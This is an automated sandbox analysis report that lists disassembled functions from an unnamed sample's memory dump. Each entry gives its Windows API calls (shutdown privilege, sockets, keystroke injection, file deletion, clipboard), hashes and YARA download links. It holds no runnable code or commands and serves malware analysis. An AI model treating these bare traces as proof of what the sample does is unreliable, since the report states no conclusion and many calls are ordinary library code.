Instruction ID: 36846d380d62bce26be0602ef661a3198d57e5a5ed34425316b6ec9865c3d69c
Opcode Fuzzy Hash: 520d06937d11228331da84d21c533ab69ac2dfa404dc7ab3c68341d1b435d543
Instruction Fuzzy Hash: 93615C3180125DEACF05EBA4C9929EDBBB6EF15341F644165E80277192EB30AF09CB70

Function 00DCED6A Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00DCED91
EmptyClipboard.USER32 ref: 00DCED97
GlobalAlloc.KERNEL32(00000002,?), ref: 00DCEDAC
CloseClipboard.USER32 ref: 00DCEEA3

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: 7a5496f5f49c3dea2099ca5f980d5c0faae5bb73f016d8b33e7a258b95013df6
Instruction ID: 3833c21e22ff719643db212a085b17bf55233730cdb4f401cfbe22ee28e07afe
Opcode Fuzzy Hash: 7a5496f5f49c3dea2099ca5f980d5c0faae5bb73f016d8b33e7a258b95013df6
Instruction Fuzzy Hash: 8341AC71204252AFD720EF15D888F1ABBA5EF44358F18C09DE8168F762C735ED42CBA0

Function 00DBE8F6 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 00DB16C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00DB170D
Part of subcall function 00DB16C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00DB173A
Part of subcall function 00DB16C3: GetLastError.KERNEL32 ref: 00DB174A

ExitWindowsEx.USER32(?,00000000), ref: 00DBE932

Strings

, xrefs: 00DBE95C
, xrefs: 00DBE920
SeShutdownPrivilege, xrefs: 00DBE902
@, xrefs: 00DBE925

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $ $@$SeShutdownPrivilege
API String ID: 2234035333-3163812486
Opcode ID: 4f8a609394a60dac6c862d026fcf985c9d291dc3ed0932f0f76f156e34f05f17
Instruction ID: cc56c3be2a14b8c223c9e30e98ba2497402ded0b8523fc8ed03fe25a26a8e337
Opcode Fuzzy Hash: 4f8a609394a60dac6c862d026fcf985c9d291dc3ed0932f0f76f156e34f05f17
Instruction Fuzzy Hash: 9D018F72620311EBEF6827B49C86BFE739CA714750F190422F913E71D2D5A09C4889B4

Function 00DD1204 Relevance: 12.1, APIs: 8, Instructions: 113networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00DD1276
WSAGetLastError.WSOCK32 ref: 00DD1283
bind.WSOCK32(00000000,?,00000010), ref: 00DD12BA
WSAGetLastError.WSOCK32 ref: 00DD12C5
closesocket.WSOCK32(00000000), ref: 00DD12F4
listen.WSOCK32(00000000,00000005), ref: 00DD1303
WSAGetLastError.WSOCK32 ref: 00DD130D
closesocket.WSOCK32(00000000), ref: 00DD133C

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: ErrorLast$closesocket$bindlistensocket
String ID:
API String ID: 540024437-0
Opcode ID: 1212ebaf58eb9c63f62f1da95abc4c0c83d8c74fc37c3544213fb216dd7abaa6
Instruction ID: 02e9bd60b65a9530b08b04c6dde7d225181a2c9fb6d1e6bfcc951d15c92840dc
Opcode Fuzzy Hash: 1212ebaf58eb9c63f62f1da95abc4c0c83d8c74fc37c3544213fb216dd7abaa6
Instruction Fuzzy Hash: D1418E35600240AFD714EF64C5C9B29BBE5EF86318F188189E8568F392C771ED86CBB1

Function 00D8B952 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00D8B9D4
_free.LIBCMT ref: 00D8B9F8
_free.LIBCMT ref: 00D8BB7F
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00DF3700), ref: 00D8BB91
WideCharToMultiByte.KERNEL32(00000000,00000000,00E2121C,000000FF,00000000,0000003F,00000000,?,?), ref: 00D8BC09
WideCharToMultiByte.KERNEL32(00000000,00000000,00E21270,000000FF,?,0000003F,00000000,?), ref: 00D8BC36
_free.LIBCMT ref: 00D8BD4B

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: _free$ByteCharMultiWide$InformationTimeZone
String ID:
API String ID: 314583886-0
Opcode ID: 96df40e06f5b8acaa06220f0724db4ac43f76d5e76ea17735cc803b0e1236833
Instruction ID: 41ab41b6bf3e4f1232cb47f87ed18a0ff8d849699e53015f80e38dea2bd00f85
Opcode Fuzzy Hash: 96df40e06f5b8acaa06220f0724db4ac43f76d5e76ea17735cc803b0e1236833
Instruction Fuzzy Hash: BEC10572904205AFDB24BF799C41AAE7BA8EF51330F1841ABE494E7251E7709E41CB70

Function 00DBD3A9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00D53AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00D53A97,?,?,00D52E7F,?,?,?,00000000), ref: 00D53AC2

Part of subcall function 00DBE199: GetFileAttributesW.KERNEL32(?,00DBCF95), ref: 00DBE19A

FindFirstFileW.KERNEL32(?,?), ref: 00DBD420
DeleteFileW.KERNEL32(?,?,?,?), ref: 00DBD470
FindNextFileW.KERNEL32(00000000,00000010), ref: 00DBD481
FindClose.KERNEL32(00000000), ref: 00DBD498
FindClose.KERNEL32(00000000), ref: 00DBD4A1

Strings

\*.*, xrefs: 00DBD3F2

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
String ID: \*.*
API String ID: 2649000838-1173974218
Opcode ID: be69dc27dbb38df5f661d32d4fde2eecd55b3f05ad22d7f62004be36f6ff1d9a
Instruction ID: 1c7d84580ec7558fe9539aabc7a98717b09aaf9f0fe17d85d979847691116adf
Opcode Fuzzy Hash: be69dc27dbb38df5f661d32d4fde2eecd55b3f05ad22d7f62004be36f6ff1d9a
Instruction Fuzzy Hash: 35316F310183859BC604EF64D8918EFB7E8EE91315F444A2DF8D293191EB30EA0D8B72

Function 00DC648E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00DC64DC
CoInitialize.OLE32(00000000), ref: 00DC6639
CoCreateInstance.OLE32(00DEFCF8,00000000,00000001,00DEFB68,?), ref: 00DC6650
CoUninitialize.OLE32 ref: 00DC68D4

Strings

.lnk, xrefs: 00DC64BA, 00DC6524, 00DC65E0

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_wcslen
String ID: .lnk
API String ID: 886957087-24824748
Opcode ID: b56ccb85117341ab80976c514f8e17b519f3cd45c66e14010b8224f945ee3e35
Instruction ID: bf00ad3c12745b05648b8755dc9d452eb72d4c31a19a8c342646de0762e25af0
Opcode Fuzzy Hash: b56ccb85117341ab80976c514f8e17b519f3cd45c66e14010b8224f945ee3e35
Instruction Fuzzy Hash: 5FD15771518301AFC704EF24C881E6BB7E9EF98305F14496DF9958B291EB30E909CBB2

Function 00DD22DA Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,00000000), ref: 00DD22E8

Part of subcall function 00DCE4EC: GetWindowRect.USER32(?,?), ref: 00DCE504

GetDesktopWindow.USER32 ref: 00DD2312
GetWindowRect.USER32(00000000), ref: 00DD2319
mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00DD2355
GetCursorPos.USER32(?), ref: 00DD2381
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00DD23DF

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForeground
String ID:
API String ID: 2387181109-0
Opcode ID: c40d358fd3c1869a29c3c6657c2d56856c620f7f20992934b6ec81398b547139
Instruction ID: 44ac6c6e6456559298b898611378b1081153521bdb794aa96a080808e85cbbbd
Opcode Fuzzy Hash: c40d358fd3c1869a29c3c6657c2d56856c620f7f20992934b6ec81398b547139
Instruction Fuzzy Hash: D231CF72504355ABCB20DF14C845FABB7A9FF84310F00091EF995DB291DB34E909CBA2

Function 00DC9B2B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00D59CB3: _wcslen.LIBCMT ref: 00D59CBD

FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00DC9B78
FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00DC9C8B

Part of subcall function 00DC3874: GetInputState.USER32 ref: 00DC38CB
Part of subcall function 00DC3874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00DC3966

Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00DC9BA8
FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00DC9C75

Strings

*.*, xrefs: 00DC9B5D

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
String ID: *.*
API String ID: 1972594611-438819550
Opcode ID: afcd0dec3f53b1614df52ef0ba18d3bdd6f1bc09f111a9d98e7f26cd65e4a7b0
Instruction ID: 169f150e56df6f9eabea7c39b5520671a8adbec04da6d1f8f9ba486e5b93dbcd
Opcode Fuzzy Hash: afcd0dec3f53b1614df52ef0ba18d3bdd6f1bc09f111a9d98e7f26cd65e4a7b0
Instruction Fuzzy Hash: F6416D7190420AAFCF14EFA4C999FEEBBB4EF05301F244159E805A7191EB319E85CB74

Function 00D6997D Relevance: 7.9, APIs: 5, Instructions: 375COMMON

Download Yara Rule

APIs

Part of subcall function 00D69BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00D69BB2

DefDlgProcW.USER32(?,?,?,?,?), ref: 00D69A4E
GetSysColor.USER32(0000000F), ref: 00D69B23
SetBkColor.GDI32(?,00000000), ref: 00D69B36

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: Color$LongProcWindow
String ID:
API String ID: 3131106179-0
Opcode ID: 4cb3685b4a2d52e48f3471a3613dbae56d1ac48b305cc715fcbc1c021c6f2678
Instruction ID: 7cd6acb4d6499b2e4194a1e59e3f0d845624e225170ba44e4b1a4c35f0a14d7f
Opcode Fuzzy Hash: 4cb3685b4a2d52e48f3471a3613dbae56d1ac48b305cc715fcbc1c021c6f2678
Instruction Fuzzy Hash: 4DA13870208544BFE728AA7D8CB8E7BB6DDDB83310F1C011AF142D6691CA35DE06D672

Function 00DD1806 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00DD304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00DD307A
Part of subcall function 00DD304E: _wcslen.LIBCMT ref: 00DD309B

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00DD185D
WSAGetLastError.WSOCK32 ref: 00DD1884
bind.WSOCK32(00000000,?,00000010), ref: 00DD18DB
WSAGetLastError.WSOCK32 ref: 00DD18E6
closesocket.WSOCK32(00000000), ref: 00DD1915

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
String ID:
API String ID: 1601658205-0
Opcode ID: 369d13f04726b748e3cbc113d8b82d7c88304b80348f1396232e33f843fc9f5b
Instruction ID: e60fb53f19078cba38c4e73109258f95efd8e9b96aa501ef4cb8b75ac9f7900d
Opcode Fuzzy Hash: 369d13f04726b748e3cbc113d8b82d7c88304b80348f1396232e33f843fc9f5b
Instruction Fuzzy Hash: 4451A175A00200AFDB20EF24C886F2A77A5EB88718F188059FD559F393D671AD458BB1

Function 00DE1C41 Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 00DE1CC0
IsWindowEnabled.USER32 ref: 00DE1CCE
GetForegroundWindow.USER32(?,?,00000001,?), ref: 00DE1CDB
IsIconic.USER32 ref: 00DE1CE9
IsZoomed.USER32 ref: 00DE1CF7

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: 845f757b22d6bc06dae39417495f5af58f7c51ab9dc7497adf832612a9121d1b
Instruction ID: ac35ea00edb711ec8fa2f6852c34c536e27d884a76df9775820fe996c54c28a9
Opcode Fuzzy Hash: 845f757b22d6bc06dae39417495f5af58f7c51ab9dc7497adf832612a9121d1b
Instruction Fuzzy Hash: F02191357402915FD721AF2BC884B6ABBA5EF85315B2D9068E84ACB351C771EC42CBB0

Function 00DBAA57 Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 00DBAAAC
SetKeyboardState.USER32(00000080), ref: 00DBAAC8
PostMessageW.USER32(?,00000102,00000001,00000001), ref: 00DBAB36
SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 00DBAB88

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: c63bec50d3c8af483321f40e33c24a5de71bc890985846985bb9d0f0f1321965
Instruction ID: b747ebf84971c3f7b260bd8175527a2faadafd981acaa0237d8314dcdf06ae44
Opcode Fuzzy Hash: c63bec50d3c8af483321f40e33c24a5de71bc890985846985bb9d0f0f1321965
Instruction Fuzzy Hash: 60311630A50348EEFF358B6C8C05BFA7BA6AB45310F08421AF5A2961E0D375C985C77A

Function 00DC5C97 Relevance: 4.6, APIs: 3, Instructions: 138fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00DC5CC1
FindNextFileW.KERNEL32(00000000,?), ref: 00DC5D17
FindClose.KERNEL32(?), ref: 00DC5D5F

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: Find$File$CloseFirstNext
String ID:
API String ID: 3541575487-0
Opcode ID: bb5f0a9dab7ad2ea81661ec4423a310833b4c7cebd1e9563d1bc157652e7ff74
Instruction ID: d164a8f939be03c394201b43f0284c40e2ace8c08d1eeb321f190a84d6134b27
Opcode Fuzzy Hash: bb5f0a9dab7ad2ea81661ec4423a310833b4c7cebd1e9563d1bc157652e7ff74
Instruction Fuzzy Hash: EC517634604B029FC714DF28D494E9AB7E4FF49314F18855DE99A8B3A2DB30F985CBA1

Function 00D82622 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 00D8271A
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00D82724
UnhandledExceptionFilter.KERNEL32(?), ref: 00D82731

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 17124e95eca1339c502b3d88189d81b19ef881497f3f234e4925555254fc23ca
Instruction ID: b0487984aa6c81895ed789bcec5900046474b3bc04d71dc33e806b86f227426d
Opcode Fuzzy Hash: 17124e95eca1339c502b3d88189d81b19ef881497f3f234e4925555254fc23ca
Instruction Fuzzy Hash: A931B474951318ABCB21DF65DC89B99BBB8EF08310F5081EAE41CA62A1E7309F858F55

Function 00DC51CD Relevance: 4.6, APIs: 3, Instructions: 76COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00DC51DA
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00DC5238
SetErrorMode.KERNEL32(00000000), ref: 00DC52A1

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: f87d72dbf9c2071444f9a09e7a6ac95766f7ca9ba636f57c75331096a4eb3a0b
Instruction ID: 48eab4aa910d0379413f6ce181f3f7c75d70d9ecd6d67ae9b8ece85d3f512689
Opcode Fuzzy Hash: f87d72dbf9c2071444f9a09e7a6ac95766f7ca9ba636f57c75331096a4eb3a0b
Instruction Fuzzy Hash: 97314B75A10619DFDB00DF54D884EADBBF4FF49314F088099E805AB366DB31E85ACBA0

Function 00DB16C3 Relevance: 4.6, APIs: 3, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 00D6FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00D70668
Part of subcall function 00D6FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00D70685

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00DB170D
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00DB173A
GetLastError.KERNEL32 ref: 00DB174A

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
String ID:
API String ID: 577356006-0
Opcode ID: 48be8d57d87190c3dfaa1e350fe78fcd467c7b8f9f71ae4a510268232753ba8a
Instruction ID: 806a859eaf90627b35903318dbbfcf4b120f4597cec84ec592fff32016d76153
Opcode Fuzzy Hash: 48be8d57d87190c3dfaa1e350fe78fcd467c7b8f9f71ae4a510268232753ba8a
Instruction Fuzzy Hash: 3C1191B2414304EFD718AF54ECC6DAAB7BDEB45714B24852EE45697241EB70FC428B70

Function 00DBD5EB Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00DBD608
DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 00DBD645
CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00DBD650

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
